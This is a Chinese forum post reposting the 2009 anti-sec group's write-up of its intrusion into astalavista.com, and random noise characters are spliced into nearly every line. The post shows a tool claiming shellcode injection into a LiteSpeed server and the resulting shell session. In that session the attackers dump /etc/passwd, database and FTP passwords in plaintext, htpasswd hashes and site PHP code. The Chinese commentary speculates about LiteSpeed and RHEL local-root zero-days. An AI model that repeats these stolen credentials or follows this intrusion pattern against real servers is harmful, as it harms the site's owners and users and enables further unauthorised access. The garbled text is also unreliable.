里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。
! ] D* I. |, [' H0 ^( K" w, K2 t `) ?9 f5 I6 @- l
[root@front3 ~]# curl -I litespeedtech.com
# D( Q" m) \$ E3 sHTTP/1.1 200 OK3 N. y9 c6 {8 X, i0 N
Date: Fri, 05 Jun 2009 22:54:51 GMT
0 y2 m2 I! i3 J! u( `* s# pServer: LiteSpeed! H4 _- m/ N4 }1 |; Z1 x
0 J; [; _2 S- Q$ U* t' B: q另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3 x64还有一个localroot 0day -_-2 G2 ?6 H7 y& |; V- |: m
P% E9 a$ T, c: [. l; V! Y
有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。& N z R+ N/ j7 g& x- a$ y3 _
' l; s% e- M& ]" n8 W% F0 @
: `# ?. R9 h2 b
/ _ \ / _____/\__ ___/ _ \ | | / _ \ \ / /| |/ _____/\__ ___/ _ \
2 e* M- E3 w% B: S6 h/ /_\ \ \_____ \ | | / /_\ \| | / /_\ \ Y / | |\_____ \ | | / /_\ \
6 g+ ?8 ^4 H n* B0 t! F% s/ ^/ | \/ \ | |/ | \ |___/ | \ / | |/ \ | |/ | \
; l6 }, Y/ E# N1 g/ y1 Y. h\____|__ /_______ / |____|\____|__ /_______ \____|__ /\___/ |___/_______ / |____|\____|__ /! i" l2 O7 u3 M" g) @
\/ \/ \/ \/ \/ \/ \/* ]- g1 i- q- \8 q, P6 s9 M; K' R
The Hacking & Security Community
9 [2 S7 f/ K1 q- @( [/ R[+] Founded in 1997 by a hacker computer enthusiast" T6 K8 N/ A. X) P
[-] Exposed in 2009 by anti-sec group
|, n4 E, U/ v) e# {- ^7 U. Q+ `; k; `" K
From < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:
* b4 {1 r' t6 \) p>> 03. Who’s behind the site?. }" w) {1 y/ O. U2 C/ u1 @
>>
, Q, p7 @3 M! M- T& l>> A team of security and IT professionals, and a countless number of contributors from all over the world.# r, J/ X9 W# Y
/ Y% u8 P& n* |>> 05. Is it true that the site is visited by script-kiddies and warez fans only?1 u1 j* R# _ G$ V3 ~" X8 `
>>
# @# R4 @2 w) l& X( l/ ^0 }>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and
( R' d; K( t( D# O9 ]1 B' ]3 `military institutions.! j' a8 _1 i3 f X: c2 {
>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.
+ @ b, h" }: P* q( c1 L4 R" a& c6 \ m @2 X6 T9 p1 U
Why has Astalavista been targeted?
- m) O: W6 x5 n- C. x% ~2 ]' M( _ s1 G- [7 R, F
Other than the fact that they are not doing any of this for the “community” but
1 u" a2 q W3 c2 l- I$ N1 zfor the money, they spread exploits for kids, claim to be a security community, _* j0 l! M& t" s, f! M
(with no real sense of security on their own servers), and they charge you $6.66( {# R. g) s6 ^4 ]( E: p! i$ D
per months to access a dead forum with a directory filled with public releases" f& e" m0 i. s
and outdated / broken services.4 ]" K( o! s+ Y. Q5 z) U* v. K
" j! A- Z6 D% `% t: u7 F) r* m- D
We wanted to see how good that “team of security and IT professionals” really is.- X H3 f; u/ ^ N9 h
8 o9 P6 R( g+ ~2 g7 b" RLet’s begin.$ X% g6 f' J+ U' s3 Y' h) a
7 d4 m* T9 K) d* m
anti-sec:~# ./g0tshell astalavista.com -p 80; f- n- m* k5 Y, M& A
[+] Connecting to astalavista.com:80
`( x+ q% [. F[+] Grabbing banner…
# b0 y. j. {2 ]0 w9 gLiteSpeed
, I/ T9 }- I! m& `4 U[+] Injecting shellcode…9 D' _ b1 r* O" y I" s
[-] Wait for it, \2 c6 s2 }7 v
! k/ x% E" ^" l0 a. F$ b9 c[~] We g0tshell W$ f2 _" W. e X" Q" b8 f( j( x
uname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux$ G# Z/ r4 O- }+ d* J
ID: uid=100(apache) gid=500(apache) groups=500(apache)
3 x& b9 T) Y1 _, _* _+ j* h- ?+ n9 I" R d% A0 J ?$ ?( g
sh-3.2$ cat /etc/passwd/ z7 y7 p. h4 |. F. ^* G
root:x:0:0:root:/root:/bin/bash9 h4 X9 D' T+ u. C2 v5 @" o* J7 {5 s
bin:x:1:1:bin:/bin:/sbin/nologin& d5 o9 s, ?( o, G5 H, b
daemon:x:2:2:daemon:/sbin:/sbin/nologin9 p( n3 M8 S, M
adm:x:3:4:adm:/var/adm:/sbin/nologin
0 J5 B5 ?2 `7 zlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin5 {2 g7 K* v- }" e5 T& w
sync:x:5:0:sync:/sbin:/bin/sync u8 [! Q: u4 K2 Z, `; Z
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
8 m* v! S9 ~/ n5 yhalt:x:7:0:halt:/sbin:/sbin/halt; I2 W$ ^1 f4 i8 K+ V* E5 q
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin& f2 f& O% y3 r; F
news:x:9:13:news:/etc/news:
; H7 @1 X) _8 J8 Tuucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin; y6 q( X! l6 w# u+ ~5 W
operator:x:11:0 perator:/root:/sbin/nologin7 y' [+ |) @0 \1 f) \/ x
games:x:12:100:games:/usr/games:/sbin/nologin& q( E! Y" }4 S, h6 [0 e
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin( v2 K& j; k. e, W5 {$ x
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
3 d* G0 Q9 U' m; q# X6 [nobody:x:99:99:Nobody:/:/sbin/nologin. v: J, H" t* n) i
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
" K% x) V% J1 F7 Kdbus:x:81:81:System message bus:/:/sbin/nologin D7 j# A* c n3 h) m3 F3 ?
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
8 K" E L S, j! Z) tmailnull:x:47:47::/var/spool/mqueue:/sbin/nologin" M+ J- U) L4 T; ?8 A# q
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin- @' T) H& a8 s' ~% d) p. D$ q
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
. D$ \& E& A7 @) [ n/ x( Z( yhaldaemon:x:68:68:HAL daemon:/:/sbin/nologin4 q# r9 E, m8 _
rpc:x:32:32 ortmapper RPC user:/:/sbin/nologin* D+ v3 a0 Q/ B6 f; Z( u9 A$ Q2 X
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin+ V8 N$ X4 q- ^! f! {' Z
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
" P* V5 V" ?$ F5 }) ?- }# Bsshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin* B' g. Q7 Q$ M4 m7 l
pcap:x:77:77::/var/arpwatch:/sbin/nologin) x3 Y! _" v5 p
named:x:25:25:Named:/var/named:/sbin/nologin, D% l% w) z3 I* X" a* l) x3 y W
apache:x:100:500::/var/www:/bin/false, I- o1 R& W4 W" g3 S/ S
diradmin:x:101:101::/usr/local/directadmin:/bin/bash! |6 u& u2 K3 E/ T
mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash
2 C7 V& F5 U n! W7 Gwebapps:x:500:501::/var/www/html:/bin/bash
1 ]) M# Y, | K6 a+ D3 D- q' Jmajordomo:x:103:2::/etc/virtual/majordomo:/bin/bash% K9 G! G6 T S) s$ R
admin:x:501:502::/home/admin:/bin/bash |8 k' @8 o5 D6 h
jon:x:502:503::/home/jon:/bin/bash
5 c4 I% y( m0 T& t c/ [com:x:503:504::/home/com:/bin/bash6 s8 {9 X2 q4 [0 Y1 {/ Z1 v0 {
ntp:x:38:38::/etc/ntp:/sbin/nologin' c. @% [- e! `9 G
ais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin W3 K# F& P( W m
astanet:x:504:505::/home/astanet:/bin/bash
[! o2 S$ Y* u+ z5 a0 P# g$ ~avahi:x:70:70:Avahi daemon:/:/sbin/nologin
, q6 S9 T( B. |* U* N8 `avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
3 T: @+ E2 p3 h0 h: X; q# u8 p! k5 K" y; } k2 B0 s% H
sh-3.2$ cat /etc/hosts. J3 t9 ]8 D' }. ?' R- F3 \6 S
# Do not remove the following line, or various programs
4 ]$ R* n3 @" o- o& x/ A# that require network functionality will fail.
8 y2 O$ t) \- h( L- S. A127.0.0.1 localhost.localdomain localhost
) f0 ]: J" x: W4 Z: v::1 localhost6.localdomain6 localhost63 P& _8 a: S' B& s/ L$ u' L0 Q
80.74.154.172 asta1.astalavistaserver.com9 u7 \0 L6 ~' Q7 e @( T* r2 I5 [" X
+ F7 ?/ J# O6 M( x; M" ish-3.2$ pwd
6 e7 L6 e7 @% r: @" ~* X$ S- y* r/home/com/public_html( w( l" W0 z: f7 F# R" ~; _
( k ?- o5 K# `7 J" ~sh-3.2$ ls -la: t3 m- p3 T$ T {
total 18460
* W, N; ]) H. B- t O# I2 Udrwxr-xr-x 30 com apache 4096 May 28 17:06 .# G6 f" Z6 q+ F4 a# Q
drwx–x–x 11 com com 4096 Jun 25 2008 ..
; [( }! v Z1 z) C$ I: E- T% Idrwxr-xr-x 2 com com 4096 Feb 2 19:29 admin
$ m# E' B+ D ?( G' q5 q8 u* Bdrwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache$ }' V8 J& l! K$ o* u
drwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin
K4 _' I+ s0 u6 d! w$ r$ E wdrwxrwxrwx 2 com com 4096 May 19 00:50 config
* Q7 y7 s% E; sdrwxr-xr-x 2 com com 4096 Mar 20 11:05 core/ a0 R3 t- E) N' `% p
drwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules5 Y9 @4 U/ e5 n* J6 t
drwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing
; r0 ?3 j3 U) U% Y' E+ gdrwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo! |1 [; y, [( ~+ m
drwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__
$ m0 @3 V3 K4 u% }8 J4 ~-rw-r–r– 1 com com 8035 May 19 14:26 directory_to_mediadir.php" x; d" n: P w( X' { w: x; r
drwxr-xr-x 2 com com 4096 Sep 9 2008 dvd3 Q( j2 |: s# F
drwxr-xr-x 3 com com 4096 Feb 2 19:29 editor4 g7 i& T% i) ]5 s A
-rw-r–r– 1 com com 3750 Feb 27 16:12 favicon.ico
( h+ X$ `* b+ }1 U5 Idrwxrwxrwx 2 com com 4096 Jun 4 08:00 feed& R# p) Y, @, r+ B; E
-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess" |, C6 @1 ^, _# l/ w7 c: L1 M
-rw-r–r– 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak
0 C1 R8 S; e$ i! g4 P8 U# O( [-rw-r–r– 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak
% L, _0 u. y$ \6 Y7 h$ odrwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool7 k% Z, w* g# C
drwxrwxrwx 14 com com 4096 Feb 2 19:29 images
' N8 B( M7 u5 ~% a X' s-rw-r–r– 1 com com 97496 Jun 2 13:01 index.php9 v, @$ T% }, s+ R
drwxr-xr-x 6 com com 4096 Feb 2 19:29 installer
" }2 ~0 X( D( }4 B8 V9 Y8 Hdrwxr-xr-x 8 com com 4096 Feb 2 19:29 lang
: Z' {1 t2 w7 e [" F( [1 u9 Cdrwxr-xr-x 22 com com 4096 Feb 2 19:29 lib
+ P F2 g) v- f0 Udrwxrwxrwx 12 com com 4096 Jun 2 07:47 media
* n. Q$ w( s( d( [& T Ndrwxr-xr-x 8 com com 4096 May 11 12:48 modifications
4 e' g1 Q% n# s# F& t, |/ Xdrwxr-xr-x 34 com com 4096 May 28 16:30 modules. k2 |0 O& F, ]+ _, S- G2 _! u$ E
drwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin
/ I: v1 s$ n/ y4 d0 sdrwxrwxr-x 22 com com 4096 May 28 17:06 _new
" K. y+ |! R$ v2 Y3 m; _5 L& E+ n! udrwxr-xr-x 26 com com 4096 Feb 2 19:27 _old/ Z" ]2 L+ q. S {
drwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy
3 E5 r7 A+ W. n) d; n# Rdrwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy, F# _7 S3 H I7 ?9 P& y" T
-rw-r–r– 1 com com 26 Feb 2 19:33 robots.txt6 E3 F6 V" D- d# r
-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml
. D n, x/ k3 h3 [* U2 g-rw-r–r– 1 com com 223 Mar 30 15:32 test.php
2 w2 b8 X1 |. X- {* V6 R/ pdrwxrwxrwx 8 com com 4096 Mar 6 13:15 themes6 z9 P* t, P6 }+ |, g9 U
drwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp% _5 \! Q" T, E# `; v6 j0 S! x6 }
drwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam
# t* n# {. B' {, o* A9 @8 V) K w. G3 v
sh-3.2$ head -20 index.php, G$ V' J) o, W
<?php
/ q- p4 v! s a+ W5 @9 y$ i5 F7 j
! D. ~9 ~* _0 ?0 }# r1 v/**8 P* Z9 |; ~2 p3 y8 }- S; T( Y
* The main page for the CMS- d/ ~7 \6 v. \6 N1 x) v
* @copyright CONTREXX CMS - COMVATION AG
, x1 G4 }# S- Q* @author Comvation Development Team
& O1 O" c8 J- B* @version v1.0.9.10.1 stable
2 |( H3 h8 @, ^! v6 m: B* @package contrexx
6 d$ F$ ?4 A) |. w6 n. q* @subpackage core
+ S4 }" Y# T6 f5 W/ d$ n: d r* @link 链接标记[url]http://www.contrexx.com/[/url] contrexx homepage
6 W8 q$ A/ o; z* @since v0.0.0.05 b3 P0 ]; }3 v+ c6 ~
* @todo Capitalize all class names in project
9 ?/ ]7 b$ B) _1 g* @uses /config/configuration.php
8 s9 E( I2 j8 F9 L( q* L6 f1 h9 \* @uses /config/settings.php
- A* ?& h2 G( g* @uses /config/version.php/ J8 d7 S6 y2 P) m. h0 ]% A
* @uses /core/API.php
, P. P- \6 D3 K* @uses /core_modules/cache/index.class.php0 B. l8 \& r, y2 ]2 N: a- |
* @uses /core/error.class.php
- i* ]' ~& t5 `' f* @uses /core_modules/banner/index.class.php: _! A# Z* `' t, N1 |
* @uses /core_modules/contact/index.class.php
) u- a0 g1 ? Q- c0 o4 \
$ B: `7 p- E ]- X' O% ]sh-3.2$ cd config/+ D/ N& z, ~5 J4 I k
sh-3.2$ ls -la# Z9 n$ l6 e7 G, X% ~7 F+ w7 @
total 32
# }) v1 E8 G$ p0 F7 G [drwxrwxrwx 2 com com 4096 May 19 00:50 .
+ _" z |3 q; J; v- gdrwxr-xr-x 30 com apache 4096 May 28 17:06 ..5 }0 e5 U; `: }: L2 E' D/ D$ U3 [
-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php
9 A# i5 e8 g$ B& P9 f5 o% h-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php! D2 x* S: D! V3 O$ i$ F! @3 I( i
-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php
3 j% Q' f: M/ [4 M$ R2 C-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php7 e9 a/ _, d- Z- R. ]0 ^
! F& B5 `+ [( i( \5 }1 ssh-3.2$ cat configuration.php
- u1 m1 s. `5 W3 _[snip]
+ }5 m( N2 _0 i* O5 x( ^( b$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost1 n" h/ }( ]; w4 o0 O! u8 q
$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name6 W& M; H$ Z& t
$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix0 z$ c; q. e- j# e
$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username
2 v. [/ K# n# t. p$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password
: [: u+ s& E9 i1 [$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)
, y% s* z8 ^% t4 Z* |; F$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..)
6 }+ [; x% m( U5 D[snip]% V/ Z5 V$ M6 R, D$ P
$_FTPCONFIG['is_activated'] = true; // Ftp support true or false
5 ~0 q& g" ^* B# b% z$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode! @$ |6 h0 ~$ W9 C3 F/ R+ q/ ~6 I
$_FTPCONFIG['host'] = ‘localhost’;// This is normally set to localhost
- D. H$ y/ @' n+ K$_FTPCONFIG['port'] = 21; // Ftp remote port% o! q8 W7 k0 C; i
$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username0 Y) R- y) ^+ I9 U! p$ b
$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password
4 b) h' Y" ?+ H$_FTPCONFIG['path'] = ‘/’; // Ftp path to cms6 k h& ~" A6 }/ o' P8 Z" H
6 b& X4 x1 D3 p7 Y
sh-3.2$ cd .., Z( |/ k, W6 p6 M' k0 Q' O
sh-3.2$ cd dvd/
; n e$ P: I! u, `9 S3 Ysh-3.2$ ls -la
8 ]+ R: B7 N" a8 S# i6 V( Btotal 2913780# Z q6 @/ r# x; @3 e+ s# l% `
drwxr-xr-x 2 com com 4096 Sep 9 2008 .2 o2 L; b5 U6 w
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
: E) h/ S1 c- [-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar7 P7 s2 h% [+ C' w0 g/ N/ H4 c
-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar% L$ |7 ~! I" Q# |$ \2 y
-rw-r–r– 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar
. z8 x- s h3 d4 q0 t-rw-r–r– 1 com com 115 Jan 29 2008 .htaccess
2 _* T' K6 ?/ y$ O" `3 e2 ]6 n
0 C. n: P5 C' _. D! Z- g! R. ~sh-3.2$ cat .htaccess
+ U0 i! N- T: T# k A# @authType Basic1 `& o' X* m' v& s
authName DVD
4 ^& r- H# x: G: z+ JauthUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
- N* O- \" Q nrequire valid-user
( @7 B7 a0 k' U Y g5 v) ?$ b! T6 ?0 V9 S" Y4 s; t
sh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
# \5 Y* A9 J+ W9 Q! ODVDdownload:CRD8cuY6.MPT6
. p2 g/ Q }" ^) }: ]0 f, QDVDdownload2:CR8a36.wluFMg
2 I8 z, c: t2 ^2 _4 k. P( ?" A: d
* O* u6 N$ k d0 Msh-3.2$ cat test.php/ B5 A% {# C. Y5 v! I9 @
<?php
! N3 o9 p% j' ]) p8 i! W/ S$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;. u3 |; W) J: |: h
$url = str_replace(array(’&’, ‘&’), ‘&’, base64_decode(rawurldecode($url)));
6 r4 s: S4 ]& u' I! j3 [echo $url;
$ Y' Q2 {+ A- Q( f9 Q4 P! j2 L( l: s?>
* y5 _) T; }+ J- p+ G1 s5 M
; E2 J/ Z6 C3 Bsh-3.2$ cd modifications/
# e, g* Y- h# c2 a* {9 p ?sh-3.2$ ls -la
4 J9 @$ _! {9 Z9 V2 Etotal 32
0 D% ~- e" M! n* f/ t% hdrwxr-xr-x 8 com com 4096 May 11 12:48 .
5 O0 g+ c! ]6 |drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
! ], ~( I7 Z; z* t+ jdrwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng* F: @9 |) I4 b3 Q
drwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs; q( ]# H( q, n1 s! ^, t
drwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools1 \/ n1 x; ~6 e6 K
drwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc6 v1 P$ F# P$ s* q) H3 L( R1 T
drwxr-xr-x 2 com com 4096 Feb 2 19:33 search8 a' I% o1 G0 j& A( f8 l
drwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp$ H' ?& s* \! X- j* Q6 O
+ `8 u$ {7 g/ csh-3.2$ ls -R4 F V% h7 Z* a% F9 o
.:2 K5 D0 \# b; d3 g
com_avtng cronjobs onlinetools pjirc search _tmp5 b$ ^$ o; U8 L8 _, `! P- |0 f' ^
- K: O. h3 q) ~) ~( x./com_avtng:$ i" i Q+ O: B' N, R( |
avtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts! i1 j, }5 w2 ~2 e* o
; n( @' b1 ^) H% T( Q! `) s
./com_avtng/scripts:4 E6 s! [+ O8 s! d& n
popunder.js
E# E, {: ` N) S) B5 p5 ?4 a! j! A0 y8 G
./cronjobs:
6 ?5 Q. J" y6 v( L) o1 V* j: ^exploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp
- c0 x) Y0 L9 c+ j) B$ n& s; u
4 T* f& A8 m6 p6 x B- ~/ I+ N./cronjobs/tmp:4 P8 \. m% Y& p
contrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv/ \4 E6 y+ N& x: _" m* S
: V& ~1 t. C5 `! u, v* c
./onlinetools:( B4 w- R; f4 W: m5 _$ _3 D
index.php
" e$ D8 ?1 E2 |
7 Y2 X. H( ~3 Z: F./pjirc:
% K" V3 w1 ^/ ]1 Y" `a_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt/ `2 @& u( _( }
AppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt
9 ? `$ E- g' w; V6 P5 ?; Lbackground.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd2 P/ @) M; e+ x. |$ U
, X; z$ m3 D; W, X; |9 T' P7 Z2 y1 l./pjirc/img:
9 d, C4 J; Q# @5 R% pange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif$ u1 b r& v0 t+ I
arbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif
5 j5 T* }& |/ R8 l- t1 C# _$ m6 ^verre-eau.gif
( J" \9 \: \2 P& C& Eargh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif
" z, Q+ r3 y7 Z& p- ?4 R! dverre-vin.gif* J% E! A5 F' e3 i6 d9 g
ballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif
+ E% r/ N+ |% M: h: rbiere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif# K; L* A I8 Q6 B/ q# H
# r3 F. P# B: F9 s5 T! L$ l./pjirc/snd:
3 Q) c4 d* H1 F Cbell2.au ding.au
% P: T+ j' _3 |, q! h; S1 S' v- ] K, V; U& J) c* h) X* r* Z. K
./search:
! d# ]8 L# }& b9 q* B) \5 k* hsearchEngines.php search.php3 U! E4 }$ `# s! G
$ P) ]; R; X& |
./_tmp:0 E/ s( x: ]$ u7 G7 I+ w% q
defaultPorts.php defaultPorts.txt7 k" \3 |- ~- Z/ {# u
5 `, I r. F* r8 c7 X L& qsh-3.2$ cd cronjobs/! K# R, c0 e% F
sh-3.2$ cat exploits.php/ V. t& e: |4 l- w
[snip]
6 a/ Y# W8 [; P9 k$categories = array();
2 c, E1 E. R' D0 s. x3 o$milw0rmFile = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;
& [4 U/ L7 K1 @( M$expolits = file($milw0rmFile);6 p* V$ R* r0 q: x0 d4 L3 ?
$comExploits = array();
/ ?2 H7 K7 j3 @) Y- h8 ?3 A[snip]+ B+ b4 k' |& @% V* j
// manage data
! c% \1 ~$ N7 c& a: T3 jfor ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640
* J, G1 c) n2 y. h
3 \. H0 O: \' V1 I5 \( b% a# v. Z // get path and title
4 C6 V) h1 i$ y3 Q% z$ O% l3 x $expolits[$x] = trim($expolits[$x]);
% Q9 g# @( w/ ? j/ N $path = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));1 r% O& l" a$ F Q g: k
$title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);1 V( R, `% B K' |( X7 U4 F
4 q: `9 |9 `1 N d // check if file exists- w, G4 N5 w% P2 e
if (file_exists($path)) {9 L7 _4 G, F$ |7 E6 P
0 u b% I! A/ R' I6 {
$text = file_get_contents($path);5 n: Q( j4 G* _) i
- N. h* e! Q# `7 m% C // get content and date
3 I# R3 [& ?) n( Q$ S //$text = htmlspecialchars($text, ENT_QUOTES);
4 y2 _) w$ m6 N, ]1 v: K $tmptext = addslashes(htmlentities($text, ENT_QUOTES, “UTF-8″));
4 }6 c+ }7 f/ M, P6 E0 C if ($tmptext != ”) {2 K V& I& r7 ]) e6 @
$text = $tmptext;
. `1 S# h9 V% A' c+ t } else {+ y0 k: |8 _3 X z V* b, t* v# m; O
$text = addslashes(htmlentities($text, ENT_QUOTES));4 p6 ?, K7 F9 d
}
1 u5 I( f0 B9 I $date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));
8 \# Q: D% }. k+ m $tmp = explode('-', $date);
- m% n0 j! s( Z1 Y m $date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));6 t, s. m6 W0 r v- _7 n% I
$cat = getCategory ($path);
- H5 b1 }, ^2 Y, s! T $ext = pathinfo(basename($path));& B. m7 y3 |9 @$ ?3 \! z/ m ]
$ext = $ext['extension'];
- R0 ^+ F, K2 D# i $qStr = ”& P/ |9 } I% J
SELECT `id`
' ~7 i4 H. j* n4 K& [ FROM `contrexx_module_exploits`
, l5 X7 k# g+ Z WHERE `title` = ‘” . $title . “‘( Y$ d( T, W3 R6 V% k4 ^! h& t- x
AND `date` = ‘” . $date . “‘
- B% o6 F' k: G2 n* w “;
4 S2 }2 M$ r+ [7 |; c+ S& l$ S echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;- D4 [/ r% c$ w+ w, F2 ^+ s/ S5 e* B
$q = $_objDB->query($qStr);) q6 w8 F! `# y2 x. K1 u" Y
2 {+ }* p3 c0 h; q
if ($q->numRows() == 0) {, ?2 X/ X2 F' w- j3 e, Z' g* R
) x# C! v) y6 p- } M k // prepare array& I: t) t" L7 Z& h" F& [& B
$comExploits[$x]['date'] = $date;
2 X7 @ O5 J( y1 F* S5 c $comExploits[$x]['title'] = $title;
: Y! r3 D7 `, _2 v" B% _5 h( e' z $comExploits[$x]['author'] = ‘milw0rm’;
, u* }7 q9 r2 F $comExploits[$x]['text'] = $text;
5 Q5 n" A5 U! @8 u. J( c4 { $comExploits[$x]['source'] = $ext;
' A3 U0 _0 v8 j& ~* `' p $comExploits[$x]['url1'] = ”;+ O9 D0 V9 d6 S% N- N
$comExploits[$x]['url2'] = ”;3 l) J- @* j5 u% x( M2 j* O% A
$comExploits[$x]['catid'] = $cat;7 n1 p ]% H9 Y6 p+ ?1 X
$comExploits[$x]['lang'] = ‘2′;
$ V! f! F1 d& o8 k, P& g. Q; W3 y $comExploits[$x]['userid'] = ‘12′;
$ Q! M( p- y: v $comExploits[$x]['startdate'] = ‘0000-00-00′;
) A, `3 y1 H/ N, s. S2 r% ] $comExploits[$x]['enddate'] = ‘0000-00-00′;
7 m6 u, e. i. i3 ? $comExploits[$x]['status'] = ‘1′;& Z+ m8 S3 j! _ v
$comExploits[$x]['changelog'] = $date;
9 s! r% h! x) t# I/ ^
0 X8 z) R X, v) Y! q0 T# D }+ s# }# F. X4 `0 d& T: R
[snip]
" f4 d1 W4 v w6 i9 C* B $xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>
( w4 T/ `: F# b4 K1 C1 e4 Y, F! M2 s<rss version=”2.0″>
4 G9 E/ r! i; `0 H. \. ?4 X5 [ <channel>- f/ Y8 ?1 O8 U3 D$ ^, s
<title>ASTALAVISTA.com - Exploits</title>9 G8 n2 Z' ]" j- ]! u
<link>http://www.astalavista.com/exploits</link>
